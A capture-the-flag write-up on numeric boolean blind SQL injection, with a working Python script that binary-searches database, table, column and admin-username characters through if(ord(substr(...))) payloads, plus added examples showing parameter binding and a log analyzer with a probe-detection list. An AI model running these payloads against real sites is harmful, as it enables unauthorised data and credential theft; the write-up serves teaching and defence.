Black-Watch Group-Entry Challenge - Web

Summary
Numeric blind SQL injection

Clicking into the hot-topics list reveals an id index parameter. Submitting 2/2 returns the content for id=1, which shows the parameter is evaluated as a number (numeric injection). Further testing showed that boolean-based blind injection works and that there is essentially no filtering.
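To show why the 2/2 probe in the writeup identifies a numeric injection, and what the backend should have done instead, here is an added example that is not part of the original writeup and not the challenge's PHP code. It uses an in-memory SQLite table; the `content` table, its rows, and both lookup functions are constructed for the demonstration (SQLite has no MySQL `if()`, so the boolean probe below compares `substr()` directly).

```python
import sqlite3


def make_db():
    """Constructed sample data standing in for the challenge's content table (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE content (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO content VALUES (?, ?)", [(1, "first"), (2, "second")])
    return conn


def lookup_vulnerable(conn, raw_id):
    """The weak pattern: the id parameter is pasted into the SQL text.

    Any expression the database can evaluate becomes part of the query, so
    "2/2" is computed as 1 and a boolean condition appended to "1 and ..."
    turns the presence of a row into a one-bit oracle.
    """
    sql = "SELECT id, title FROM content WHERE id=" + raw_id
    return conn.execute(sql).fetchone()


def lookup_hardened(conn, raw_id):
    """The fix: validate the type up front, then bind the value as a parameter.

    The driver sends the integer separately from the SQL text, so nothing in
    raw_id can change the query's structure.
    """
    if not raw_id.isdigit():
        raise ValueError("id must be a non-negative integer")
    return conn.execute(
        "SELECT id, title FROM content WHERE id=?", (int(raw_id),)
    ).fetchone()


if __name__ == "__main__":
    db = make_db()
    # The arithmetic probe from the writeup: 2/2 evaluates to 1.
    print(lookup_vulnerable(db, "2/2"))
    # One bit of a blind probe: row present when the guessed character is right.
    probe = "1 and (substr((SELECT title FROM content WHERE id=1),1,1)='{}')"
    print(lookup_vulnerable(db, probe.format("f")), lookup_vulnerable(db, probe.format("x")))
    # The hardened lookup rejects anything that is not a plain integer.
    try:
        lookup_hardened(db, "2/2")
    except ValueError as e:
        print("rejected:", e)
```

Rejecting non-digit input before it reaches the database is what makes the 2/2 check fail; parameter binding is what makes the boolean oracle impossible even when validation is forgotten elsewhere.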

```python
# coding=utf-8
import requests
import time

flag = ""
url0 = "http://89f00b7b-7f72-4344-a14d-126dd667006a.node4.buuoj.cn:81/backend/content_detail.php?id={}"

# Each payload evaluates to 1 when the byte at position {} is >= {}, otherwise 0;
# the page only renders a "title" element when the condition holds.
sql1 = "if(ord(substr(database(),{},1))>={},1,0)"  # database name
sql2 = "if(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{},1))>={},1,0)"  # table names
sql3 = "if(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='admin')),{},1))>={},1,0)"  # column names
sql4 = "if(ord(substr((select(group_concat(username))from(admin)),{},1))>={},1,0)"  # data

url = url0.format(sql4)
# pick which of the queries above to run

for x in range(1, 100):
    # binary search over printable ASCII (32..127) for the character at position x
    left = 32
    right = 127
    while right > left:
        mid = (left + right + 1) // 2
        pay = url.format(x, mid)
        response = requests.get(url=pay)
        if "title" in response.text:
            left = mid
        else:
            right = mid - 1
        time.sleep(0.02)  # avoid dirty responses
        # print(pay)
        # print(response.text)
    flag += chr(right)
    print(chr(right))
    print(flag)
print(flag)
```

Retrieve the account from the admin table, log in with it, and obtain the flag.
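From the defender's side, the script above leaves a very recognisable trail: one client issuing many requests to the same endpoint whose `id` parameter is an expression rather than a number. The following is an added example, not part of the original writeup, that reads constructed access-log lines (the log lines, the `PROBE_MARKERS` list and the threshold in `suspicious_clients` are all assumptions made for the demonstration) and counts, per client, how many requests carried a non-numeric or probe-shaped `id`.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (not taken from the challenge) that mimic what a
# character-by-character blind probe leaves behind: one client hammering
# content_detail.php with if(ord(substr(...))) expressions, one client browsing normally.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Sep/2021:10:00:01 +0000] "GET /backend/content_detail.php?id=1 HTTP/1.1" 200 2310
10.0.0.5 - - [07/Sep/2021:10:00:02 +0000] "GET /backend/content_detail.php?id=if(ord(substr(database(),1,1))>=79,1,0) HTTP/1.1" 200 2310
10.0.0.5 - - [07/Sep/2021:10:00:02 +0000] "GET /backend/content_detail.php?id=if(ord(substr(database(),1,1))>=103,1,0) HTTP/1.1" 200 418
10.0.0.5 - - [07/Sep/2021:10:00:03 +0000] "GET /backend/content_detail.php?id=if%28ord%28substr%28database%28%29%2C2%2C1%29%29%3E%3D79%2C1%2C0%29 HTTP/1.1" 200 2310
10.0.0.9 - - [07/Sep/2021:10:00:03 +0000] "GET /backend/content_detail.php?id=2 HTTP/1.1" 200 2290
10.0.0.9 - - [07/Sep/2021:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 5120
"""

# client, method, target, status, size from a common-log-format line
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) \S+" (\d{3}) (\d+)')

# Fragments that characterise a character-extraction blind probe (assumed list).
PROBE_MARKERS = ("substr(", "ord(", "ascii(", "information_schema", "sleep(")


def classify_request(target):
    """Return (path, verdict) for one request target.

    verdict is 'no_id', 'numeric', 'non_numeric' or 'blind_probe'.
    """
    parts = urlsplit(target)
    ids = parse_qs(parts.query).get("id")
    if not ids:
        return parts.path, "no_id"
    value = unquote(ids[0]).lower()  # parse_qs already decodes; unquote covers double encoding
    if value.isdigit():
        return parts.path, "numeric"
    if any(marker in value for marker in PROBE_MARKERS):
        return parts.path, "blind_probe"
    return parts.path, "non_numeric"


def analyze(log_text):
    """Count per client how many requests carried a non-numeric or probe-shaped id."""
    stats = defaultdict(lambda: {"requests": 0, "non_numeric": 0, "blind_probe": 0})
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # skip lines that are not in the expected format
        client, _method, target, _status, _size = match.groups()
        _path, verdict = classify_request(target)
        stats[client]["requests"] += 1
        if verdict in ("non_numeric", "blind_probe"):
            stats[client]["non_numeric"] += 1
        if verdict == "blind_probe":
            stats[client]["blind_probe"] += 1
    return dict(stats)


def suspicious_clients(stats, min_probes=2):
    """Clients that sent at least min_probes probe-shaped requests (threshold is an assumption)."""
    return sorted(client for client, s in stats.items() if s["blind_probe"] >= min_probes)


if __name__ == "__main__":
    per_client = analyze(SAMPLE_LOG)
    for client, s in per_client.items():
        print(client, s)
    print("suspicious:", suspicious_clients(per_client))
```

A single non-numeric `id` (such as the 2/2 check) is classified but not enough on its own to flag a client; the binary search needs roughly seven requests per character, so a low threshold on `blind_probe` already separates the extraction run from ordinary traffic. Because the decision is made on the decoded parameter, percent-encoded probes are counted the same as plain ones.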


Author

inanb

Published on

2021-09-07

Updated on

2021-09-07
